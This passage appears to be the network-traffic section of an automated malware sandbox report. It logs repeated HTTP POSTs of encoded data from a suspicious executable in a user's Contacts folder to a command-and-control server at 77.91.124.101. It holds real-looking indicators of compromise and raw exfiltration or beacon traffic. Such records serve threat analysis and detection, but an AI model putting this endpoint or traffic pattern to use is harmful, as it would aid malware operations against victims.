                                                            Data Ascii: WP][[ZZZ]WUWU\WZPRX@V_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8Y+2*#7[/B.^4\5(#.W3"S'02::\+?7,&G''^)/
                                                            Nov 21, 2023 04:48:28.794825077 CET538INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 01 32 06 27 03 37 30 3f 52 29 3a 2a 0e 2e 00 00 44 3f 23 00 07 32 3e 38 13 30 39 03 50 3d 3f 38 5c 30 2a 2f 0e 21 26 38 11 2b 30 21 5a 0c 1d 26 18 35 28 06 0c 3c 2e 20 13 3c 3e 28 5b 26 32 27 1a 2b 3d 34 0a 34 0a 30 02 24 23 20 1a 2f 3f 31 5e 2e 38 25 1c 32 2c 2a 10 20 2d 23 5f 0c 14 24 08 22 31 2f 5e 22 33 3e 55 21 37 38 16 23 27 2b 56 30 3d 30 50 32 01 2e 04 2b 28 20 55 32 09 2c 13 27 2a 37 56 32 39 2f 57 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !2'70?R):*.D?#2>809P=?8\0*/!&8+0!Z&5(<. <>([&2'+=440$# /?1^.8%2,* -#_$"1/^"3>U!78#'+V0=0P2.+( U2,'*7V29/W<*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9377.91.124.10180192.168.2.549808C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:28.395704985 CET533OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.592679977 CET534INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.592916012 CET535OUTData Raw: 57 50 5d 5b 5b 5a 5a 5a 5d 57 55 57 55 5c 57 5a 50 52 58 40 56 5f 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP][[ZZZ]WUWU\WZPRX@V_W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8Y+2*#7[/B.^4\5(#.W3"S'02::\+?7,&G''^)/
                                                            Nov 21, 2023 04:48:28.794825077 CET538INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 01 32 06 27 03 37 30 3f 52 29 3a 2a 0e 2e 00 00 44 3f 23 00 07 32 3e 38 13 30 39 03 50 3d 3f 38 5c 30 2a 2f 0e 21 26 38 11 2b 30 21 5a 0c 1d 26 18 35 28 06 0c 3c 2e 20 13 3c 3e 28 5b 26 32 27 1a 2b 3d 34 0a 34 0a 30 02 24 23 20 1a 2f 3f 31 5e 2e 38 25 1c 32 2c 2a 10 20 2d 23 5f 0c 14 24 08 22 31 2f 5e 22 33 3e 55 21 37 38 16 23 27 2b 56 30 3d 30 50 32 01 2e 04 2b 28 20 55 32 09 2c 13 27 2a 37 56 32 39 2f 57 3c 2a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !2'70?R):*.D?#2>809P=?8\0*/!&8+0!Z&5(<. <>([&2'+=440$# /?1^.8%2,* -#_$"1/^"3>U!78#'+V0=0P2.+( U2,'*7V29/W<*&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9477.91.124.10180192.168.2.549809C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:28.519782066 CET534OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.718663931 CET535INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.718990088 CET538OUTData Raw: 52 5d 5d 5a 5b 5b 5a 59 5d 57 55 57 55 5b 57 56 50 58 58 42 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]Z[[ZY]WUWU[WVPXXBVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(%=(")3'_,'9#&) !'9&#9-+*_>/?8&G''^)3
                                                            Nov 21, 2023 04:48:28.922313929 CET539INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            94192.168.2.54980977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:28.519782066 CET534OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.718663931 CET535INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.718990088 CET538OUTData Raw: 52 5d 5d 5a 5b 5b 5a 59 5d 57 55 57 55 5b 57 56 50 58 58 42 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]Z[[ZY]WUWU[WVPXXBVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+(%=(")3'_,'9#&) !'9&#9-+*_>/?8&G''^)3
                                                            Nov 21, 2023 04:48:28.922313929 CET539INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            95192.168.2.54981077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:29.236812115 CET540OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:29.434954882 CET540INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:29.435201883 CET542OUTData Raw: 52 5c 58 59 5b 5a 5a 5f 5d 57 55 57 55 5d 57 5a 50 5c 58 49 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\XY[ZZ_]WUWU]WZP\XIV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)?+)=#;\,1#2)#&$-.09-*\(4;>&G''^)+
                                                            Nov 21, 2023 04:48:29.637830973 CET543INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:29 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9577.91.124.10180192.168.2.549810C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:29.236812115 CET540OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:29.434954882 CET540INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:29.435201883 CET542OUTData Raw: 52 5c 58 59 5b 5a 5a 5f 5d 57 55 57 55 5d 57 5a 50 5c 58 49 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R\XY[ZZ_]WUWU]WZP\XIV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)?+)=#;\,1#2)#&$-.09-*\(4;>&G''^)+
                                                            Nov 21, 2023 04:48:29.637830973 CET543INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:29 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            96192.168.2.54981177.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:29.957750082 CET543OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:30.160639048 CET544INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:30.160854101 CET546OUTData Raw: 52 5f 5d 5b 5b 5f 5f 5e 5d 57 55 57 55 5c 57 56 50 5a 58 44 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_][[__^]WUWU\WVPZXDV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>=^<=/B&_#1\<#*3&0T-)?,4;&G''^)/
                                                            Nov 21, 2023 04:48:30.369224072 CET546INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9677.91.124.10180192.168.2.549811C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:29.957750082 CET543OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:30.160639048 CET544INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:30.160854101 CET546OUTData Raw: 52 5f 5d 5b 5b 5f 5f 5e 5d 57 55 57 55 5c 57 56 50 5a 58 44 56 5f 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_][[__^]WUWU\WVPZXDV_W]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>=^<=/B&_#1\<#*3&0T-)?,4;&G''^)/
                                                            Nov 21, 2023 04:48:30.369224072 CET546INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            97192.168.2.54981277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:30.689914942 CET547OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:30.886128902 CET547INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:30.886403084 CET550OUTData Raw: 52 5d 58 59 5b 5a 5a 59 5d 57 55 57 55 58 57 55 50 5f 58 48 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XY[ZZY]WUWUXWUP_XHV^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)=Z<]:T> 7];.Z7%X)#"'=W099%(Z#_/&G''^)?
                                                            Nov 21, 2023 04:48:31.087574005 CET550INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9777.91.124.10180192.168.2.549812C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:30.689914942 CET547OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:30.886128902 CET547INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:30.886403084 CET550OUTData Raw: 52 5d 58 59 5b 5a 5a 59 5d 57 55 57 55 58 57 55 50 5f 58 48 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]XY[ZZY]WUWUXWUP_XHV^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^)=Z<]:T> 7];.Z7%X)#"'=W099%(Z#_/&G''^)?
                                                            Nov 21, 2023 04:48:31.087574005 CET550INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            98192.168.2.54981377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:31.409105062 CET551OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:31.608257055 CET551INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:31.608489990 CET554OUTData Raw: 52 5f 5d 5a 5b 52 5a 5c 5d 57 55 57 55 5b 57 52 50 5c 58 46 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_]Z[RZ\]WUWU[WRP\XFVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y=^=?;.R= ,["9"<#.R3-R009,+=??,&G''^)3
                                                            Nov 21, 2023 04:48:31.811938047 CET554INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9877.91.124.10180192.168.2.549813C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:31.409105062 CET551OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:31.608257055 CET551INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:31.608489990 CET554OUTData Raw: 52 5f 5d 5a 5b 52 5a 5c 5d 57 55 57 55 5b 57 52 50 5c 58 46 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_]Z[RZ\]WUWU[WRP\XFVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y=^=?;.R= ,["9"<#.R3-R009,+=??,&G''^)3
                                                            Nov 21, 2023 04:48:31.811938047 CET554INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:31 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            99192.168.2.54981477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:32.308875084 CET555OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:32.505321980 CET555INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:32.505526066 CET558OUTData Raw: 57 59 5d 5e 5b 5b 5f 59 5d 57 55 57 55 5f 57 51 50 5e 58 48 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]^[[_Y]WUWU_WQP^XHVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;)_?+R)3,-79>+ *W$%$#&R-<8>&G''^)#
                                                            Nov 21, 2023 04:48:32.706655025 CET558INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            9977.91.124.10180192.168.2.549814C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:32.308875084 CET555OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
